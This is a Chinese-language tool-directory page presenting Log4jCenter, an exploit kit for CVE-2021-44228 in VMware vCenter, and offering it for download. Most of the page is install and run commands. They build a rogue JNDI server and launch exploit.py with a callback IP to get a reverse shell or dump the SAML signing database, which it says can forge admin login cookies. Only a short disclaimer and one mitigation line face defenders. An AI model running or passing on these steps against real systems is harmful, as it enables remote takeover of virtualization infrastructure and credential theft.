Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4jCenter — 在vCenter中利用CVE-2021-44228实现远程代码执行以及更多。 | Kitploit
工具/GitHubGitHub/puzzlepeaches/log4jcenter
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露渗透测试命令与控制
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

在vCenter中利用CVE-2021-44228实现远程代码执行以及更多。

查看仓库
105194年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4jCenter

在vCenter中利用CVE-2021-44228实现远程代码执行等操作。关于利用过程的博客文章详见下方链接:

  • 如何利用VMWare vCenter中的Log4j漏洞

为什么?

该漏洞的概念验证代码分散各处,且需要手动执行。本仓库将利用过程自动化,并展示利用后可能实现的额外攻击路径。

安装

此仓库可手动使用,也可通过Docker运行。

手动安装

要手动下载并运行利用工具,请执行以下步骤。首先,确保攻击主机上已安装Java和Maven。在基于Debian的操作系统上,可通过apt运行以下命令完成安装:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

克隆GitHub仓库并安装所有Python依赖:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

在Log4jCenter仓库根目录下,使用以下命令编译Rogue-Jndi项目:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker安装

首先,确保攻击主机上已安装Docker(此处不再赘述安装步骤)。

然后,执行以下命令克隆仓库并构建我们将使用的Docker镜像:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

运行容器时,请使用类似下方的命令,并在末尾附加您的命令行参数。例如,以下命令用于利用vCenter并获取反弹shell。请注意,容器本身不会捕获反弹shell,您需要在另一个shell会话中创建nc监听器:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

用法

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

示例

在本地系统上使用该工具获取反弹shell:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

在Docker容器中导出SAML签名数据库:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

注意事项

  • 由于某些未知原因,脚本首次运行后反弹shell负载可能不会触发。您可能需要多次运行利用工具才能收到回连。后续将研究此问题并在未来版本中修复。
  • utils目录中包含了仓库 vcenter_saml_login。您可以结合 -e 标志使用它来导出vCenter SAML签名数据库,并生成vSphere的管理登录Cookie。您需要单独安装其依赖。
  • 对于防御者,您可以使用即将发布的补丁或此处详述的临时缓解措施来修复此问题。

免责声明

本工具专为渗透测试设计;未经双方同意使用本工具攻击目标属于违法行为。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,且不对本程序的任何滥用行为负责。

下载工具